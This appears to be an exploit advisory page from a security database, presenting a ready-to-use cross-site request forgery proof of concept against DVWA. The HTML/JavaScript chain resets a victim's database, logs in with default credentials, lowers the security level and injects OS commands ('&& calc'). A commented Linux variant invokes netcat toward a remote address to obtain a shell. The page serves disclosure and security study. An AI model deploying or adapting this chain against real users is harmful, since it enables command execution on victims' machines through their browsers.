DVWA Cross Site Request Forgery

2014.09.16
Credit: Paulos and Tabor
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to first reset the DVWA database of victim, then make the victim log in using the default resets, next crafts another CSRF to change the challenge level to low to make exploitation more probable, then use these to craft a command execution CSRF and possibly get a shell. :) *This PoC will open calculator as a demo execution in approximately 5 seconds.* The attacker just needs to know you have DVWA for this to work. Paulos Yibelo and Tabor N. Shiferaw 2014 --> <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'> </script> <div id='loader'></div> <Script> //document.getElementById("loader").innerHTML = 'Loading...'; var one = {"create_db":'whatever'}; var two = {"username":"admin","password":"password","Login":"Login"}; var three = {"security":"low","seclev_submit":"Submit"}; //windows opens calculator; change this to whatever your desire var four = {"ip":"127.0.0.1 && notepad && calc","submit":"submit"}; //linux //var four = {"ip":"127.0.0.1;netcat -l 15.11.11.x -p 4444","submit":"submit"}; /* *step 1 *Reset the Databse */ function start_exploit() { $("#loader").html("Loading..."); $.ajax({ url:"http://localhost/dvwa/setup.php", type:"POST", data:one, success: function(x){ dvwaLogin(); } }); } /* *step 2 *login using default new password */ function dvwaLogin() { $.ajax({ url:"http://localhost/dvwa/login.php", type:"POST", data:two, success:function(x){ levelChanger(); } }); } /* *step 3 *set level to low */ function levelChanger(){ $.ajax({ url:"http://localhost/dvwa/security.php", type:"POST", data:three, success:function(x){ commandExecution(); } }); } /* *step 4 *execute command */ function commandExecution(){ $.ajax( { url:"http://localhost/dvwa/vulnerabilities/exec/index.php", type:"POST", data:four, success:function(x){ //document.getElementById("loader").innerHTML = "Executed"; $("#loader").text("Loaded"); } } ); } start_exploit(); </script> <!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top